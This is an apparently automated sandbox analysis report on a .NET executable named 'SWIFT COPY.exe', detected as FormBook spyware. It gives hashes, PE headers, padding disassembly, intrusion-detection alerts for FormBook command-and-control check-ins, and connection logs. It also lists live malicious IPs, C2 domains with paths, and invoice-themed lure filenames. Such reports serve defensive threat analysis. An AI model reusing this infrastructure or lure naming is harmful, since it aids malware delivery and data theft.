                                                                                            Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                            Run name:Run with higher sleep bypass
                                                                                            Number of analysed new started processes analysed:9
                                                                                            Number of new started drivers analysed:0
                                                                                            Number of existing processes analysed:0
                                                                                            Number of existing drivers analysed:0
                                                                                            Number of injected processes analysed:2
                                                                                            Technologies:
                                                                                            • HCA enabled
                                                                                            • EGA enabled
                                                                                            • AMSI enabled
                                                                                            Analysis Mode:default
                                                                                            Analysis stop reason:Timeout
                                                                                            Sample name:SWIFT COPY.exe
                                                                                            Detection:MAL
                                                                                            Classification:mal100.troj.spyw.evad.winEXE@7/2@4/3
                                                                                            EGA Information:
                                                                                            • Successful, ratio: 75%
                                                                                            HCA Information:
                                                                                            • Successful, ratio: 90%
                                                                                            • Number of executed functions: 121
                                                                                            • Number of non-executed functions: 321
                                                                                            Cookbook Comments:
                                                                                            • Found application associated with file extension: .exe
                                                                                            • Sleeps bigger than 100000000ms are automatically reduced to 1000ms
                                                                                            • Sleep loops longer than 100000000ms are bypassed. Single calls with delay of 100000000ms and higher are ignored
                                                                                            • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
                                                                                            • Excluded IPs from analysis (whitelisted): 23.218.208.109, 20.12.23.50, 13.107.246.63
                                                                                            • Excluded domains from analysis (whitelisted): fs.microsoft.com, ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                                                                            • Not all processes where analyzed, report is missing behavior information
                                                                                            • Report creation exceeded maximum time and may have missing disassembly code information.
                                                                                            No simulations
                                                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                            134.122.191.18772STaC6BmljfbIQ.exeGet hashmaliciousFormBookBrowse
                                                                                            • www.smalleyes.icu/s6zh/
                                                                                            194.58.112.174Nieuwebestellingen10122024.exeGet hashmaliciousFormBookBrowse
                                                                                            • www.synd.fun/6sgf/
                                                                                            SRT68.exeGet hashmaliciousFormBookBrowse
                                                                                            • www.fantastica.digital/5srj/
                                                                                            72STaC6BmljfbIQ.exeGet hashmaliciousFormBookBrowse
                                                                                            • www.elinor.club/1ne4/
                                                                                            specification and drawing.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                                                            • www.synd.fun/6sgf/
                                                                                            Pre Alert PO TVKJEANSA00967.bat.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                                                            • www.elinor.club/7plr/
                                                                                            CV Lic H&S Olivetti Renzo.exeGet hashmaliciousFormBookBrowse
                                                                                            • www.sklad-iq.online/gdvz/
                                                                                            CV Lic H&S Olivetti Renzo.exeGet hashmaliciousFormBookBrowse
                                                                                            • www.sklad-iq.online/gdvz/
                                                                                            Item-RQF-9456786.exeGet hashmaliciousUnknownBrowse
                                                                                            • www.sklad-iq.online/j4lg/
                                                                                            PO AT-5228.exeGet hashmaliciousFormBookBrowse
                                                                                            • www.marketplacer.top/xprp/
                                                                                            shipping doc_20241111.exeGet hashmaliciousFormBookBrowse
                                                                                            • www.marketplacer.top/xprp/
                                                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                            www.elinor.club72STaC6BmljfbIQ.exeGet hashmaliciousFormBookBrowse
                                                                                            • 194.58.112.174
                                                                                            Pre Alert PO TVKJEANSA00967.bat.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                                                            • 194.58.112.174
                                                                                            www.smalleyes.icu72STaC6BmljfbIQ.exeGet hashmaliciousFormBookBrowse
                                                                                            • 134.122.191.187
                                                                                            www.pbfgm.xyz72STaC6BmljfbIQ.exeGet hashmaliciousFormBookBrowse
                                                                                            • 172.67.218.146
                                                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                            BCPL-SGBGPNETGlobalASNSGhttp://93287.mobiGet hashmaliciousUnknownBrowse
                                                                                            • 137.220.229.108
                                                                                            T2dvU8f2xg.exeGet hashmaliciousUnknownBrowse
                                                                                            • 118.107.29.172
                                                                                            oiBxz37xUo.dllGet hashmaliciousUnknownBrowse
                                                                                            • 118.107.29.172
                                                                                            T2dvU8f2xg.exeGet hashmaliciousUnknownBrowse
                                                                                            • 118.107.29.172
                                                                                            oiBxz37xUo.dllGet hashmaliciousUnknownBrowse
                                                                                            • 118.107.29.172
                                                                                            7nJ9Jo78Vq.dllGet hashmaliciousUnknownBrowse
                                                                                            • 118.107.29.172
                                                                                            VJQyKuHEUe.exeGet hashmaliciousUnknownBrowse
                                                                                            • 27.50.63.8
                                                                                            7nJ9Jo78Vq.dllGet hashmaliciousUnknownBrowse
                                                                                            • 118.107.29.172
                                                                                            nrGkqbCyKP.exeGet hashmaliciousUnknownBrowse
                                                                                            • 27.50.63.8
                                                                                            9Kdid5k13f.exeGet hashmaliciousUnknownBrowse
                                                                                            • 27.50.63.8
                                                                                            CLOUDFLARENETUSY41xQGmT37.exeGet hashmaliciousLummaC, StealcBrowse
                                                                                            • 104.21.64.80
                                                                                            O3u9C8cpzl.exeGet hashmaliciousLummaC, StealcBrowse
                                                                                            • 104.21.64.80
                                                                                            niwvNnBk2p.exeGet hashmaliciousLummaC, StealcBrowse
                                                                                            • 104.21.64.80
                                                                                            661fW9gxDp.exeGet hashmaliciousLummaCBrowse
                                                                                            • 104.21.64.80
                                                                                            bPkG0wTVon.exeGet hashmaliciousUnknownBrowse
                                                                                            • 104.16.184.241
                                                                                            66776676676.exeGet hashmaliciousGuLoader, Snake Keylogger, VIP KeyloggerBrowse
                                                                                            • 172.67.177.134
                                                                                            S6oj0LoSiL.exeGet hashmaliciousLummaCBrowse
                                                                                            • 104.21.64.80
                                                                                            pM3fQBuTLy.exeGet hashmaliciousVidarBrowse
                                                                                            • 172.64.41.3
                                                                                            dlhost.exeGet hashmaliciousXWormBrowse
                                                                                            • 104.20.4.235
                                                                                            c2A6GRyAwn.dllGet hashmaliciousNitolBrowse
                                                                                            • 104.21.42.47
                                                                                            AS-REGRUarm.nn.elfGet hashmaliciousMirai, OkiruBrowse
                                                                                            • 194.58.59.91
                                                                                            Nieuwebestellingen10122024.exeGet hashmaliciousFormBookBrowse
                                                                                            • 194.58.112.174
                                                                                            hax.ppc.elfGet hashmaliciousMiraiBrowse
                                                                                            • 194.58.94.235
                                                                                            Outstanding Invoices Spreadsheet Scan 00495_PDF.exeGet hashmaliciousFormBookBrowse
                                                                                            • 31.31.198.145
                                                                                            Revo.Uninstaller.Pro.v5.3.4.exeGet hashmaliciousUnknownBrowse
                                                                                            • 194.87.189.43
                                                                                            Revo.Uninstaller.Pro.v5.3.4.exeGet hashmaliciousUnknownBrowse
                                                                                            • 194.87.189.43
                                                                                            cXjy5Y6dXX.exeGet hashmaliciousRHADAMANTHYSBrowse
                                                                                            • 193.124.205.63
                                                                                            SRT68.exeGet hashmaliciousFormBookBrowse
                                                                                            • 194.58.112.174
                                                                                            New Order.exeGet hashmaliciousFormBookBrowse
                                                                                            • 31.31.196.17
                                                                                            72STaC6BmljfbIQ.exeGet hashmaliciousFormBookBrowse
                                                                                            • 194.58.112.174
                                                                                            No context
                                                                                            No context
                                                                                            Process:C:\Users\user\Desktop\SWIFT COPY.exe
                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                            Category:dropped
                                                                                            Size (bytes):1216
                                                                                            Entropy (8bit):5.34331486778365
                                                                                            Encrypted:false
                                                                                            SSDEEP:24:MLUE4K5E4KH1qE4qXKDE4KhKiKhPKIE4oKNzKoZAE4Kze0E4x84j:MIHK5HKH1qHiYHKh3oPtHo6hAHKze0HJ
                                                                                            MD5:1330C80CAAC9A0FB172F202485E9B1E8
                                                                                            SHA1:86BAFDA4E4AE68C7C3012714A33D85D2B6E1A492
                                                                                            SHA-256:B6C63ECE799A8F7E497C2A158B1FFC2F5CB4F745A2F8E585F794572B7CF03560
                                                                                            SHA-512:75A17AB129FE97BBAB36AA2BD66D59F41DB5AFF44A705EF3E4D094EC5FCD056A3ED59992A0AC96C9D0D40E490F8596B07DCA9B60E606B67223867B061D9D0EB2
                                                                                            Malicious:true
                                                                                            Reputation:high, very likely benign file
                                                                                            Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02
                                                                                            Process:C:\Windows\SysWOW64\finger.exe
                                                                                            File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                                            Category:dropped
                                                                                            Size (bytes):114688
                                                                                            Entropy (8bit):0.9746603542602881
                                                                                            Encrypted:false
                                                                                            SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                                            MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                                            SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                                            SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                                            SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                                            Malicious:false
                                                                                            Reputation:high, very likely benign file
                                                                                            Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                            File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                            Entropy (8bit):7.678388051406651
                                                                                            TrID:
                                                                                            • Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                                                                                            • Win32 Executable (generic) a (10002005/4) 49.78%
                                                                                            • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                                                                            • Generic Win/DOS Executable (2004/3) 0.01%
                                                                                            • DOS Executable Generic (2002/1) 0.01%
                                                                                            File name:SWIFT COPY.exe
                                                                                            File size:986'112 bytes
                                                                                            MD5:180a3e0827818592194c3a46dd8e9dd7
                                                                                            SHA1:fa90e6b8c4a962d3cb324cf23afe68845d6e5013
                                                                                            SHA256:b46e3f5fe8669966df0df40ef2ff40a1de2f8141da974f8058eb03c2897feacf
                                                                                            SHA512:837d3a0481469d9a5b0774ff48678cbce3f57e0375a72682b3cdb3092726e28d75fa6ec15ef12994e95c8b51ac845c49eb40eb9489fa2d5eca8b3b1f798e2eb2
                                                                                            SSDEEP:24576:tlAu2uO7lfceffJpwZs4U0IP6F4DB8lu2:tliu2l7BpeQ0x6E
                                                                                            TLSH:6325D0C03B29770ECD6DA931C53ADC7862642E787005B9D3ADDA2B977ACD1129E0CF91
                                                                                            File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....fbg..............0......2........... ........@.. .......................`............@................................
                                                                                            Icon Hash:674d797961216d59
                                                                                            Entrypoint:0x4ef78e
                                                                                            Entrypoint Section:.text
                                                                                            Digitally signed:false
                                                                                            Imagebase:0x400000
                                                                                            Subsystem:windows gui
                                                                                            Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                                            DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                                                            Time Stamp:0x67626619 [Wed Dec 18 06:05:13 2024 UTC]
                                                                                            TLS Callbacks:
                                                                                            CLR (.Net) Version:
                                                                                            OS Version Major:4
                                                                                            OS Version Minor:0
                                                                                            File Version Major:4
                                                                                            File Version Minor:0
                                                                                            Subsystem Version Major:4
                                                                                            Subsystem Version Minor:0
                                                                                            Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744
                                                                                            Instruction
                                                                                            jmp dword ptr [00402000h]
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            NameVirtual AddressVirtual Size Is in Section
                                                                                            IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                            IMAGE_DIRECTORY_ENTRY_IMPORT0xef73c0x4f.text
                                                                                            IMAGE_DIRECTORY_ENTRY_RESOURCE0xf00000x2f48.rsrc
                                                                                            IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                            IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                            IMAGE_DIRECTORY_ENTRY_BASERELOC0xf40000xc.reloc
                                                                                            IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                                            IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                            IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                            IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                            IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                            IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                            IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                                                                                            IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                            IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                                                                                            IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                                                                            NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                            .text0x20000xed7940xed800aa6f5b7315b3d49639bc743889b26e21False0.8716683799342105data7.67844699512359IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                            .rsrc0xf00000x2f480x30007ecf5514e07f31218a1d4a2a112742cbFalse0.9449055989583334data7.740984197030074IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                            .reloc0xf40000xc0x200949d0b30def62e7a7870d9d588e57babFalse0.044921875data0.10191042566270775IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                                                                            NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                            RT_ICON0xf00e80x2bf4PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced0.9942232492001422
                                                                                            RT_GROUP_ICON0xf2cdc0x14data1.05
                                                                                            RT_VERSION0xf2cf00x258data0.49
                                                                                            DLLImport
                                                                                            mscoree.dll_CorExeMain
                                                                                            TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                            2024-12-19T08:39:48.421435+01002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.449884134.122.191.18780TCP
                                                                                            2024-12-19T08:39:48.421435+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.449884134.122.191.18780TCP
                                                                                            2024-12-19T08:40:53.098661+01002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.449763104.21.86.11180TCP
                                                                                            2024-12-19T08:40:53.098661+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.449763104.21.86.11180TCP
                                                                                            2024-12-19T08:41:18.792202+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.449825194.58.112.17480TCP
                                                                                            2024-12-19T08:41:21.459881+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.449831194.58.112.17480TCP
                                                                                            2024-12-19T08:41:24.187165+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.449836194.58.112.17480TCP
                                                                                            2024-12-19T08:41:26.835082+01002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.449845194.58.112.17480TCP
                                                                                            2024-12-19T08:41:26.835082+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.449845194.58.112.17480TCP
                                                                                            2024-12-19T08:41:34.452861+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.449863134.122.191.18780TCP
                                                                                            2024-12-19T08:41:37.124839+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.449869134.122.191.18780TCP
                                                                                            2024-12-19T08:41:39.796635+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.449875134.122.191.18780TCP
                                                                                            TimestampSource PortDest PortSource IPDest IP
                                                                                            Dec 19, 2024 08:40:51.374372005 CET4976380192.168.2.4104.21.86.111
                                                                                            Dec 19, 2024 08:40:51.494568110 CET8049763104.21.86.111192.168.2.4
                                                                                            Dec 19, 2024 08:40:51.494659901 CET4976380192.168.2.4104.21.86.111
                                                                                            Dec 19, 2024 08:40:51.510485888 CET4976380192.168.2.4104.21.86.111
                                                                                            Dec 19, 2024 08:40:51.629972935 CET8049763104.21.86.111192.168.2.4
                                                                                            Dec 19, 2024 08:40:53.098361969 CET8049763104.21.86.111192.168.2.4
                                                                                            Dec 19, 2024 08:40:53.098515034 CET8049763104.21.86.111192.168.2.4
                                                                                            Dec 19, 2024 08:40:53.098660946 CET4976380192.168.2.4104.21.86.111
                                                                                            Dec 19, 2024 08:40:53.098805904 CET8049763104.21.86.111192.168.2.4
                                                                                            Dec 19, 2024 08:40:53.098853111 CET4976380192.168.2.4104.21.86.111
                                                                                            Dec 19, 2024 08:40:53.103151083 CET4976380192.168.2.4104.21.86.111
                                                                                            Dec 19, 2024 08:40:53.222549915 CET8049763104.21.86.111192.168.2.4
                                                                                            Dec 19, 2024 08:41:17.341029882 CET4982580192.168.2.4194.58.112.174
                                                                                            Dec 19, 2024 08:41:17.460757971 CET8049825194.58.112.174192.168.2.4
                                                                                            Dec 19, 2024 08:41:17.461064100 CET4982580192.168.2.4194.58.112.174
                                                                                            Dec 19, 2024 08:41:17.476660013 CET4982580192.168.2.4194.58.112.174
                                                                                            Dec 19, 2024 08:41:17.596195936 CET8049825194.58.112.174192.168.2.4
                                                                                            Dec 19, 2024 08:41:18.788994074 CET8049825194.58.112.174192.168.2.4
                                                                                            Dec 19, 2024 08:41:18.789129972 CET8049825194.58.112.174192.168.2.4
                                                                                            Dec 19, 2024 08:41:18.792201996 CET4982580192.168.2.4194.58.112.174
                                                                                            Dec 19, 2024 08:41:18.984168053 CET4982580192.168.2.4194.58.112.174
                                                                                            Dec 19, 2024 08:41:20.010313988 CET4983180192.168.2.4194.58.112.174
                                                                                            Dec 19, 2024 08:41:20.129898071 CET8049831194.58.112.174192.168.2.4
                                                                                            Dec 19, 2024 08:41:20.130177021 CET4983180192.168.2.4194.58.112.174
                                                                                            Dec 19, 2024 08:41:20.147219896 CET4983180192.168.2.4194.58.112.174
                                                                                            Dec 19, 2024 08:41:20.266788006 CET8049831194.58.112.174192.168.2.4
                                                                                            Dec 19, 2024 08:41:21.459768057 CET8049831194.58.112.174192.168.2.4
                                                                                            Dec 19, 2024 08:41:21.459788084 CET8049831194.58.112.174192.168.2.4
                                                                                            Dec 19, 2024 08:41:21.459881067 CET4983180192.168.2.4194.58.112.174
                                                                                            Dec 19, 2024 08:41:21.655962944 CET4983180192.168.2.4194.58.112.174
                                                                                            Dec 19, 2024 08:41:22.694830894 CET4983680192.168.2.4194.58.112.174
                                                                                            Dec 19, 2024 08:41:22.814306021 CET8049836194.58.112.174192.168.2.4
                                                                                            Dec 19, 2024 08:41:22.814460039 CET4983680192.168.2.4194.58.112.174
                                                                                            Dec 19, 2024 08:41:22.853152990 CET4983680192.168.2.4194.58.112.174
                                                                                            Dec 19, 2024 08:41:22.975292921 CET8049836194.58.112.174192.168.2.4
                                                                                            Dec 19, 2024 08:41:22.975383043 CET8049836194.58.112.174192.168.2.4
                                                                                            Dec 19, 2024 08:41:22.975411892 CET8049836194.58.112.174192.168.2.4
                                                                                            Dec 19, 2024 08:41:22.975439072 CET8049836194.58.112.174192.168.2.4
                                                                                            Dec 19, 2024 08:41:22.975466013 CET8049836194.58.112.174192.168.2.4
                                                                                            Dec 19, 2024 08:41:22.975492954 CET8049836194.58.112.174192.168.2.4
                                                                                            Dec 19, 2024 08:41:22.975522041 CET8049836194.58.112.174192.168.2.4
                                                                                            Dec 19, 2024 08:41:22.975549936 CET8049836194.58.112.174192.168.2.4
                                                                                            Dec 19, 2024 08:41:22.975578070 CET8049836194.58.112.174192.168.2.4
                                                                                            Dec 19, 2024 08:41:24.143435001 CET8049836194.58.112.174192.168.2.4
                                                                                            Dec 19, 2024 08:41:24.187165022 CET4983680192.168.2.4194.58.112.174
                                                                                            Dec 19, 2024 08:41:24.267527103 CET8049836194.58.112.174192.168.2.4
                                                                                            Dec 19, 2024 08:41:24.267652035 CET4983680192.168.2.4194.58.112.174
                                                                                            Dec 19, 2024 08:41:24.359199047 CET4983680192.168.2.4194.58.112.174
                                                                                            Dec 19, 2024 08:41:25.387603045 CET4984580192.168.2.4194.58.112.174
                                                                                            Dec 19, 2024 08:41:25.507344007 CET8049845194.58.112.174192.168.2.4
                                                                                            Dec 19, 2024 08:41:25.507489920 CET4984580192.168.2.4194.58.112.174
                                                                                            Dec 19, 2024 08:41:25.516135931 CET4984580192.168.2.4194.58.112.174
                                                                                            Dec 19, 2024 08:41:25.635684013 CET8049845194.58.112.174192.168.2.4
                                                                                            Dec 19, 2024 08:41:26.834894896 CET8049845194.58.112.174192.168.2.4
                                                                                            Dec 19, 2024 08:41:26.834966898 CET8049845194.58.112.174192.168.2.4
                                                                                            Dec 19, 2024 08:41:26.835082054 CET4984580192.168.2.4194.58.112.174
                                                                                            Dec 19, 2024 08:41:26.837935925 CET4984580192.168.2.4194.58.112.174
                                                                                            Dec 19, 2024 08:41:26.957442999 CET8049845194.58.112.174192.168.2.4
                                                                                            Dec 19, 2024 08:41:32.813184023 CET4986380192.168.2.4134.122.191.187
                                                                                            Dec 19, 2024 08:41:32.933458090 CET8049863134.122.191.187192.168.2.4
                                                                                            Dec 19, 2024 08:41:32.933592081 CET4986380192.168.2.4134.122.191.187
                                                                                            Dec 19, 2024 08:41:32.949417114 CET4986380192.168.2.4134.122.191.187
                                                                                            Dec 19, 2024 08:41:33.069348097 CET8049863134.122.191.187192.168.2.4
                                                                                            Dec 19, 2024 08:41:34.452861071 CET4986380192.168.2.4134.122.191.187
                                                                                            Dec 19, 2024 08:41:34.572592020 CET8049863134.122.191.187192.168.2.4
                                                                                            Dec 19, 2024 08:41:34.572788954 CET4986380192.168.2.4134.122.191.187
                                                                                            Dec 19, 2024 08:41:35.471915007 CET4986980192.168.2.4134.122.191.187
                                                                                            Dec 19, 2024 08:41:35.591428041 CET8049869134.122.191.187192.168.2.4
                                                                                            Dec 19, 2024 08:41:35.591646910 CET4986980192.168.2.4134.122.191.187
                                                                                            Dec 19, 2024 08:41:35.608900070 CET4986980192.168.2.4134.122.191.187
                                                                                            Dec 19, 2024 08:41:35.728521109 CET8049869134.122.191.187192.168.2.4
                                                                                            Dec 19, 2024 08:41:37.124839067 CET4986980192.168.2.4134.122.191.187
                                                                                            Dec 19, 2024 08:41:37.244903088 CET8049869134.122.191.187192.168.2.4
                                                                                            Dec 19, 2024 08:41:37.245093107 CET4986980192.168.2.4134.122.191.187
                                                                                            Dec 19, 2024 08:41:38.143699884 CET4987580192.168.2.4134.122.191.187
                                                                                            Dec 19, 2024 08:41:38.263395071 CET8049875134.122.191.187192.168.2.4
                                                                                            Dec 19, 2024 08:41:38.263534069 CET4987580192.168.2.4134.122.191.187
                                                                                            Dec 19, 2024 08:41:38.284279108 CET4987580192.168.2.4134.122.191.187
                                                                                            Dec 19, 2024 08:41:38.404069901 CET8049875134.122.191.187192.168.2.4
                                                                                            Dec 19, 2024 08:41:38.404110909 CET8049875134.122.191.187192.168.2.4
                                                                                            Dec 19, 2024 08:41:38.404165030 CET8049875134.122.191.187192.168.2.4
                                                                                            Dec 19, 2024 08:41:38.404194117 CET8049875134.122.191.187192.168.2.4
                                                                                            Dec 19, 2024 08:41:38.404264927 CET8049875134.122.191.187192.168.2.4
                                                                                            Dec 19, 2024 08:41:38.404314041 CET8049875134.122.191.187192.168.2.4
                                                                                            Dec 19, 2024 08:41:38.404459000 CET8049875134.122.191.187192.168.2.4
                                                                                            Dec 19, 2024 08:41:38.404525042 CET8049875134.122.191.187192.168.2.4
                                                                                            Dec 19, 2024 08:41:38.404577017 CET8049875134.122.191.187192.168.2.4
                                                                                            Dec 19, 2024 08:41:39.796634912 CET4987580192.168.2.4134.122.191.187
                                                                                            Dec 19, 2024 08:41:39.917196035 CET8049875134.122.191.187192.168.2.4
                                                                                            Dec 19, 2024 08:41:39.917285919 CET4987580192.168.2.4134.122.191.187
                                                                                            Dec 19, 2024 08:41:40.815253019 CET4988480192.168.2.4134.122.191.187
                                                                                            Dec 19, 2024 08:41:40.935174942 CET8049884134.122.191.187192.168.2.4
                                                                                            Dec 19, 2024 08:41:40.935257912 CET4988480192.168.2.4134.122.191.187
                                                                                            Dec 19, 2024 08:41:40.944854021 CET4988480192.168.2.4134.122.191.187
                                                                                            Dec 19, 2024 08:41:41.064352989 CET8049884134.122.191.187192.168.2.4
                                                                                            TimestampSource PortDest PortSource IPDest IP
                                                                                            Dec 19, 2024 08:40:51.060406923 CET6000653192.168.2.41.1.1.1
                                                                                            Dec 19, 2024 08:40:51.366868973 CET53600061.1.1.1192.168.2.4
                                                                                            Dec 19, 2024 08:41:08.145827055 CET5122653192.168.2.41.1.1.1
